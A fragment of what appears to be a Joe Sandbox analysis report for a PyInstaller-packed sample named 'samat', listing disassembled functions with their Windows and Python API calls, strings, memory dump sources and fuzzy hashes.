Associated: 00000008.00000002.4573616995.00007FF8B8114000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573730405.00007FF8B8143000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000008.00000002.4573844736.00007FF8B8148000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7fe0000_samat.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 28aa62da7c2b343be502b308ef65a68d306ba655c8ab5602ffdcf5a4e2c32b8f
Instruction ID: cf62e3219355823b4e59e3c5c008163b2e9e0cd074f2bc4e632174136f56a839
Opcode Fuzzy Hash: 28aa62da7c2b343be502b308ef65a68d306ba655c8ab5602ffdcf5a4e2c32b8f
Instruction Fuzzy Hash: DB118C32615B8596DB14DF59E4401ADB3A9FF84BC0B484236EF9D43B68EF38E162C744

Function 00007FF7E12DEB98 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF7E12DB32A,?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A), ref: 00007FF7E12DEBED

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction ID: 7ef74b484ef9c1ed0a7ced0d4a83893371043d47036ea417e5906fc1f7edcc34
Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
Instruction Fuzzy Hash: 7EF03756B0960241FF597665DC573B982986F98B80F888532C90F862D1EDBCB4818232

Function 00007FF7E12DD5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF7E12D0C90,?,?,?,00007FF7E12D22FA,?,?,?,?,?,00007FF7E12D3AE9), ref: 00007FF7E12DD63A

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: 6e2baa4037b2b19c620ba4ac7aeafc4a5e396838dfde7811840410d8a8b2229c
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 28F05E12F0C64A4AFF553771AC03375929C5F887A0F884732DD2E852C5DEBCB48081B2

Non-executed Functions

Function 00007FF7E12C89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8A56

Part of subcall function 00007FF7E12DA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12DA490

Part of subcall function 00007FF7E12D871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12D8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8AE6
CreateProcessW.KERNEL32 ref: 00007FF7E12C8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8B28

Part of subcall function 00007FF7E12C2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2C9E
Part of subcall function 00007FF7E12C2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7E12C3706,?,00007FF7E12C3804), ref: 00007FF7E12C2D63
Part of subcall function 00007FF7E12C2C50: MessageBoxW.USER32 ref: 00007FF7E12C2D99

RegisterClassW.USER32 ref: 00007FF7E12C8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8B8B
CreateWindowExW.USER32 ref: 00007FF7E12C8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C15
PeekMessageW.USER32 ref: 00007FF7E12C8C39
TranslateMessage.USER32 ref: 00007FF7E12C8C47
DispatchMessageW.USER32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C51
PeekMessageW.USER32 ref: 00007FF7E12C8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E04
GetExitCodeProcess.KERNEL32 ref: 00007FF7E12C8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF7E12C3F7F), ref: 00007FF7E12C8E2F

Strings

CreateProcessW, xrefs: 00007FF7E12C8B37
PyInstallerOnefileHiddenWindow, xrefs: 00007FF7E12C8B54
Failed to create child process!, xrefs: 00007FF7E12C8B30
PyInstaller Onefile Hidden Window, xrefs: 00007FF7E12C8B95

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: eba343eb55c1bcdafe6450e80ed1054b3ccd7343653f69bfcc94d6bd62d1b3b5
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: C8D17232B08A8286E711AF34EC563A9B768FF84758F808237DA5D87A94DFBCD144C711

Function 00007FF8B7E88D60 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88DAB
PyErr_Clear.PYTHON313 ref: 00007FF8B7E88DB9
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88DD1
PyErr_Clear.PYTHON313 ref: 00007FF8B7E88DDF
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88E24
PySequence_Check.PYTHON313 ref: 00007FF8B7E88E32
PyErr_SetString.PYTHON313 ref: 00007FF8B7E88E4D
PySequence_Size.PYTHON313 ref: 00007FF8B7E88E5E
PySequence_Tuple.PYTHON313 ref: 00007FF8B7E88E7A
PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E88ED0
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E88EE6
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF8B7E88F37

Part of subcall function 00007FF8B7E8E768: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8E782

Part of subcall function 00007FF8B7E89550: _Py_NewReference.PYTHON313 ref: 00007FF8B7E89570
Part of subcall function 00007FF8B7E89550: GetLengthSid.ADVAPI32 ref: 00007FF8B7E89579
Part of subcall function 00007FF8B7E89550: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E89583
Part of subcall function 00007FF8B7E89550: CopySid.ADVAPI32 ref: 00007FF8B7E89595

PyErr_SetString.PYTHON313 ref: 00007FF8B7E88F8B
_Py_NewReference.PYTHON313 ref: 00007FF8B7E88FBC
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88FC5
memset.VCRUNTIME140 ref: 00007FF8B7E88FDC

Strings

|n:SID, xrefs: 00007FF8B7E88DA4
sub authorities sequence size must be <= 8, xrefs: 00007FF8B7E88E6D
(bbbbbb)O:SID, xrefs: 00007FF8B7E88E0B
sub authorities must be a sequence of integers., xrefs: 00007FF8B7E88E3C
SID buffer size beyond INT_MAX, xrefs: 00007FF8B7E88F81
|llllllll:SID, xrefs: 00007FF8B7E88EAE
s#:SID, xrefs: 00007FF8B7E88DCA
AllocateAndInitializeSid, xrefs: 00007FF8B7E88F43

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Tuple$Arg_Err_Parse$Sequence_malloc$ClearReferenceString$AllocateCheckCopyDeallocInitializeLengthSizememset
String ID: (bbbbbb)O:SID$AllocateAndInitializeSid$SID buffer size beyond INT_MAX$s#:SID$sub authorities must be a sequence of integers.$sub authorities sequence size must be <= 8$|llllllll:SID$|n:SID
API String ID: 2352083970-3682999398
Opcode ID: 020ee9fc2ce227d5ea7689a31ee209964d0e18efe041a45036f0acedb8e9d53f
Instruction ID: 36e2b9b0f6d6ac1bf787ea7c6026aaad067550465a0a939f1f0d7cfa83fd9776
Opcode Fuzzy Hash: 020ee9fc2ce227d5ea7689a31ee209964d0e18efe041a45036f0acedb8e9d53f
Instruction Fuzzy Hash: 8C81F832A18B4299EB109F69E8402AD33A4FF48BC8F804536EB4D97B69EF3CD514C740

Function 00007FF8B7E87EB0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 130COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E87EEC
PyErr_SetString.PYTHON313 ref: 00007FF8B7E87F26
GetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E87F6A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87F82
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF8B7E87F95
GetSecurityDescriptorOwner.ADVAPI32 ref: 00007FF8B7E87FE8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E87FFB
GetSecurityDescriptorGroup.ADVAPI32 ref: 00007FF8B7E8800C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8801F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88030
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E88046

Part of subcall function 00007FF8B7E87950: IsValidSecurityDescriptor.ADVAPI32(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87960
Part of subcall function 00007FF8B7E87950: PyErr_SetString.PYTHON313(?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8797B

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

Strings

SetSecurityDescriptorDacl, xrefs: 00007FF8B7E87FA1
iOi:SetSecurityDescriptorDacl, xrefs: 00007FF8B7E87EE3
The object is not a PyACL object, xrefs: 00007FF8B7E87F1C

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurityfree$DaclErr_String$Arg_GroupLengthOwnerParseTupleValid
String ID: SetSecurityDescriptorDacl$The object is not a PyACL object$iOi:SetSecurityDescriptorDacl
API String ID: 1359849467-4100764314
Opcode ID: c69bcfbae6702bafd583d989010392b99e7b92f64845daa9d82c487b6be77957
Instruction ID: 55efac4c5ec802a75f50cfe6deeaa5ee2ea02a5f6e9e606eeeb97f631241d610
Opcode Fuzzy Hash: c69bcfbae6702bafd583d989010392b99e7b92f64845daa9d82c487b6be77957
Instruction Fuzzy Hash: E3511922B18B5299FB559FAAD8401BC23A1BF44FC8F894432EF1D67AA5DE3CE445C310

Function 00007FF8B7E8C400 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 133windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
PyUnicode_FromWideChar.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C549
PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
_Py_Dealloc.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5BE

Strings

ignore, xrefs: 00007FF8B7E8C55B
(iNN), xrefs: 00007FF8B7E8C571
No error message is available, xrefs: 00007FF8B7E8C49A

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Unicode_$BuildCharDeallocDecodeErr_ErrorFormatFreeFromLastLocalMessageObjectValueWide
String ID: (iNN)$No error message is available$ignore
API String ID: 3492665310-37674240
Opcode ID: 89342b33277597b3a4676ff5a8e6ea240fe01a07b6f10a9c172c7993dd11e9a3
Instruction ID: e30745f1ae5c96369d829667a7ad3486a17fb59b1628ae886c7e7cc53dc84729
Opcode Fuzzy Hash: 89342b33277597b3a4676ff5a8e6ea240fe01a07b6f10a9c172c7993dd11e9a3
Instruction Fuzzy Hash: E4514A22A08B5285FA648F5DA44427D63A2BF89FD4F984276EB4E437F5DE3CE4428300

Function 00007FF8B7E8FA14 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B7E8FA30
memset.VCRUNTIME140 ref: 00007FF8B7E8FA54
RtlCaptureContext.KERNEL32 ref: 00007FF8B7E8FA5D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B7E8FA77
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B7E8FAB8
memset.VCRUNTIME140 ref: 00007FF8B7E8FAEB
IsDebuggerPresent.KERNEL32 ref: 00007FF8B7E8FB0C
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E8FB2D
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B7E8FB38

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: a77b7a5226053fc0ebc07969f81f816b5156b1559ac007c1bd8a292e365ebe04
Instruction ID: e29c234ddd35413f65f1a73b5ff3158f76fd8f647df39c82c0955a09b620e254
Opcode Fuzzy Hash: a77b7a5226053fc0ebc07969f81f816b5156b1559ac007c1bd8a292e365ebe04
Instruction Fuzzy Hash: F5311A72609B8186EB609FA5E8503ED7364FB84B94F44443ADB4D8BBA9DF3CD648C710

Function 00007FF8B8261960 Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8B826197C
memset.VCRUNTIME140 ref: 00007FF8B82619A0
RtlCaptureContext.KERNEL32 ref: 00007FF8B82619A9
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8B82619C3
RtlVirtualUnwind.KERNEL32 ref: 00007FF8B8261A04
memset.VCRUNTIME140 ref: 00007FF8B8261A37
IsDebuggerPresent.KERNEL32 ref: 00007FF8B8261A58
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8B8261A79
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8B8261A84

Memory Dump Source

Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true

Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
Instruction ID: e158997cee793527f0956da554860688c1a7e78e5e6f17100acc7527c707a899
Opcode Fuzzy Hash: f8ae4d2eff8d27b3a0b7405f1d7147d7316b9bc7e7709510c05685c771672a79
Instruction Fuzzy Hash: EA316F72609B818AEB608FA4E8503ED73A4FB84785F44443ADB4E47B98DF3CD649C718

Function 00007FF7E12C83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C842B
RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84AE
DeleteFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84CD
FindNextFileW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84DB
FindClose.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84EC
RemoveDirectoryW.KERNEL32(?,00007FF7E12C8919,00007FF7E12C3FA5), ref: 00007FF7E12C84F5

Strings

%s\*, xrefs: 00007FF7E12C83F2

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: be77b914b5352e0c1d764396ffd378e90c9967b9c534c40af67204c626d5dd18
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 59418221B0C94285EB30AB10EC463BAE369FB94754FC18237D69D83694EFBCD585C762

Function 00007FF7E12CD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF7E12CD148
RtlCaptureContext.KERNEL32 ref: 00007FF7E12CD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF7E12CD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF7E12CD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF7E12CD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12CD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF7E12CD24C

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: da7d22fd89f193bd324d2f6b7ffb245b114b81ec7e29bfa21c2b7e0aa29bb85c
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: 5C313D72709B8586EB619F60E8813EEB364FB84704F44403BDA4E57B99DFB8D548C721

Function 00007FF7E12E5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7E12E5C45

Part of subcall function 00007FF7E12E5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E55AC

Part of subcall function 00007FF7E12DA948: HeapFree.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA95E
Part of subcall function 00007FF7E12DA948: GetLastError.KERNEL32(?,?,?,00007FF7E12E2D22,?,?,?,00007FF7E12E2D5F,?,?,00000000,00007FF7E12E3225,?,?,?,00007FF7E12E3157), ref: 00007FF7E12DA968

Part of subcall function 00007FF7E12DA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA909
Part of subcall function 00007FF7E12DA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7E12DA8DF,?,?,?,?,?,00007FF7E12DA7CA), ref: 00007FF7E12DA92E

_get_daylight.LIBCMT ref: 00007FF7E12E5C34

Part of subcall function 00007FF7E12E55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7E12E560C

_get_daylight.LIBCMT ref: 00007FF7E12E5EAA
_get_daylight.LIBCMT ref: 00007FF7E12E5EBB
_get_daylight.LIBCMT ref: 00007FF7E12E5ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7E12E610C), ref: 00007FF7E12E5EF3

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
